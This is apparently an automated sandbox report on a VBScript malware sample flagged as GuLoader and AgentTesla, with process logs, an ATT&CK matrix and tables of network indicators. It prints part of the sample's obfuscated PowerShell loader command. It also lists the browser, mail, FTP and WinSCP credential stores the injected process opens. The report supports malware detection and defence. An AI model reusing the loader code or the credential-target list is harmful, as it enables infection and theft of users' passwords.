MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. 
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSamJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\System32\wscript.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match - File source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - File opened: C:\FTP Navigator\Ftplist.txt
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exe - Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

            Remote Access Functionality

            Source: Yara match - File source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match - File source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information321
            Scripting
            Valid Accounts221
            Windows Management Instrumentation
            321
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            1
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            111
            Process Injection
            2
            Obfuscated Files or Information
            11
            Input Capture
            24
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter
            Logon Script (Windows)Logon Script (Windows)1
            Software Packing
            1
            Credentials in Registry
            211
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS1
            Process Discovery
            Distributed Component Object Model11
            Input Capture
            13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Behavior Graph ID: 1427934, Sample: Arrival Notice PUS_pdf.vbs, Startdate: 18/04/2024, Architecture: WINDOWS, Score: 100
            Sample-level DNS/IP: mail.myhydropowered.com; ip-api.com; 3 other IPs or domains
            Sample-level signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
            wscript.exe (started)
              Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures
              powershell.exe (started)
                DNS/IP: drive.usercontent.google.com 142.250.105.132, 443, 49708, 49714 GOOGLEUS United States; drive.google.com 142.251.15.139, 443, 49707, 49713 GOOGLEUS United States
                Signatures: Suspicious powershell command line found; Very long command line found; Found suspicious powershell code related to unpacking or dynamic code loading
                powershell.exe (started)
                  Signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading
                  wab.exe (started)
                    DNS/IP: ip-api.com 208.95.112.1, 49716, 80 TUT-ASUS United States; api.ipify.org 104.26.13.205, 443, 49715 CLOUDFLARENETUS United States
                    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
                  cmd.exe (started)
                conhost.exe (started)
                cmd.exe (started)
              WmiPrvSE.exe (started)

            Source | Detection | Scanner | Label
            Arrival Notice PUS_pdf.vbs | 13% | ReversingLabs | Script-WScript.Trojan.Guloader
            Arrival Notice PUS_pdf.vbs | 15% | Virustotal |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label
            bg.microsoft.map.fastly.net | 0% | Virustotal |
            mail.myhydropowered.com | 5% | Virustotal |
            Source | Detection | Scanner | Label
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
            http://crl.microsoft | 0% | URL Reputation | safe
            https://go.micro | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | unknown
            drive.google.com | 142.251.15.139 | true | false | | high
            drive.usercontent.google.com | 142.250.105.132 | true | false | | high
            api.ipify.org | 104.26.13.205 | true | false | | high
            ip-api.com | 208.95.112.1 | true | false | | high
            mail.myhydropowered.com | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            https://api.ipify.org/ | false | | high
            http://ip-api.com/line/?fields=hosting | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://www.google.com | powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://drive.usercontent.google.com | powershell.exe, 00000003.00000002.2266575309.00000189233D7000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
            http://crl.microsoft | powershell.exe, 00000009.00000002.2003068899.00000000032BF000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://go.micro | powershell.exe, 00000003.00000002.2266575309.0000018922882000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/ | powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/License | powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/Icon | powershell.exe, 00000003.00000002.2435920158.0000018931660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://drive.googP | powershell.exe, 00000003.00000002.2266575309.0000018923399000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
            https://drive.google.com | powershell.exe, 00000003.00000002.2266575309.0000018922EAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921817000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://drive.usercontent.googh | powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
            https://drive.usercontent.google.com | powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://drive.google.com | powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://aka.ms/pscore68 | powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://apis.google.com | powershell.exe, 00000003.00000002.2266575309.00000189233C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.00000189233C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.0000018921A79000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2266575309.000001892339D000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.2266575309.00000189215F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 00000009.00000002.2004751510.0000000005068000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://drive.usercontent.google.comhP | powershell.exe, 00000003.00000002.2266575309.0000018921A7D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
            142.251.15.139 | drive.google.com | United States | 15169 | GOOGLEUS | false
            142.250.105.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
            104.26.13.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
            Joe Sandbox version: 40.0.0 Tourmaline
            Analysis ID: 1427934
            Start date and time: 2024-04-18 11:06:00 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 7m 49s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 16
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: Arrival Notice PUS_pdf.vbs
            Detection: MAL
            Classification: mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
            EGA Information:
            • Successful, ratio: 33.3%
            HCA Information:
            • Successful, ratio: 94%
            • Number of executed functions: 124
            • Number of non-executed functions: 7
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 199.232.210.172
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 8108 because it is empty
            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtCreateKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            Time | Type | Description
            11:06:52 | API Interceptor | 1x Sleep call for process: wscript.exe modified
            11:07:05 | API Interceptor | 4266x Sleep call for process: powershell.exe modified
            11:07:59 | API Interceptor | 3676x Sleep call for process: wab.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      208.95.112.1yDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      dgxK76VlXC.exeGet hashmaliciousAsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRATBrowse
                                                      • ip-api.com/line/?fields=hosting
                                                      104.26.13.205SecuriteInfo.com.Trojan.DownLoaderNET.960.9931.28151.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                      • api.ipify.org/
                                                      Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      ArenaWarSetup.exeGet hashmaliciousStealitBrowse
                                                      • api.ipify.org/?format=json
                                                      Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/?format=json
                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      E4sbo4F6Sz.exeGet hashmaliciousUnknownBrowse
                                                      • api.ipify.org/
                                                      SecuriteInfo.com.Win64.RATX-gen.31127.4101.exeGet hashmaliciousPureLog Stealer, Targeted RansomwareBrowse
                                                      • api.ipify.org/
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      ip-api.comyDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                      • 208.95.112.1
                                                      QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                      • 208.95.112.1
                                                      bg.microsoft.map.fastly.netTransferencias SEPA.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      FACTURA 130424435.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      justificant de transfer#U00e8ncia.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      Justificante de pago.vbsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      awb_shipping_documents_17_04_2024_00000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                      • 199.232.214.172
                                                      http://185.91.69.110Get hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      http://ranchpools.comGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      https://windowdefalerts-error0x21903-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                      • 199.232.210.172
                                                      https://windowdefalerts-error0x21908-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                      • 199.232.210.172
                                                      https://windowdefalerts-error0x21902-alert-virus-detected.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                      • 199.232.214.172
                                                      api.ipify.orgPurchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.12.205
                                                      SecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      invoice & packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 172.67.74.152
                                                      ZG17uv37pi.exeGet hashmaliciousUnknownBrowse
                                                      • 104.26.13.205
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUS5FU4LRpQdy.rtfGet hashmaliciousRemcosBrowse
                                                      • 104.21.84.67
                                                      NEW ORDER.docGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.21.25.202
                                                      file.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 104.26.4.15
                                                      dendy.exeGet hashmaliciousRisePro StealerBrowse
                                                      • 104.26.5.15
                                                      5Dw2hTQmiB.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.44.10
                                                      Purchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 104.26.13.205
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.44.10
                                                      Leoch-Purchase Order.exe | malicious | AgentTesla | 172.67.74.152
                                                      p silp AI240190.pdf.exe | malicious | AgentTesla | 104.26.12.205
                                                      https://ortelia.com/Downloads/Curator/CuratorSetup.exe | malicious | Havoc | 1.1.1.1
                                                      TUT-ASUSyDOZ8nTvm8.rtf | malicious | AgentTesla | 208.95.112.1
                                                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe | malicious | AgentTesla | 208.95.112.1
                                                      Fizetes,jpg.scr.exe | malicious | AgentTesla | 208.95.112.1
                                                      Cintillo 2024.pdf.exe | malicious | AgentTesla | 208.95.112.1
                                                      comprobante.pdf.exe | malicious | AgentTesla | 208.95.112.1
                                                      RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine | 208.95.112.1
                                                      QUOTATION-#170424.exe | malicious | AgentTesla | 208.95.112.1
                                                      dekont.pdf.exe | malicious | AgentTesla, PureLog Stealer | 208.95.112.1
                                                      PO JSC_109117.exe | malicious | AgentTesla | 208.95.112.1
                                                      PURCHASE ORDER LISTS GREEN VALLY CORP.bat | malicious | GuLoader | 208.95.112.1
                                                      Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                      3b5074b1b5d032e5620f69f9f700ff0e | Transferencias SEPA.vbs | malicious | Unknown | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | shipping doc.vbs | malicious | GuLoader | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | FACTURA 130424435.vbs | malicious | Unknown | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | justificant de transfer#U00e8ncia.vbs | malicious | Unknown | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | Justificante de pago.vbs | malicious | Unknown | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order PDF.exe | malicious | AgentTesla | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | Leoch-Purchase Order.exe | malicious | AgentTesla | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | p silp AI240190.pdf.exe | malicious | AgentTesla | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exe | malicious | Unknown | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      3b5074b1b5d032e5620f69f9f700ff0e | SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exe | malicious | AgentTesla | 142.251.15.139, 142.250.105.132, 104.26.13.205
                                                      37f463bf4616ecd445d4a1937da06e19 | shipping doc.vbs | malicious | GuLoader | 142.251.15.139, 142.250.105.132
                                                      37f463bf4616ecd445d4a1937da06e19 | u2.bat | malicious | Bazar Loader, Qbot | 142.251.15.139, 142.250.105.132
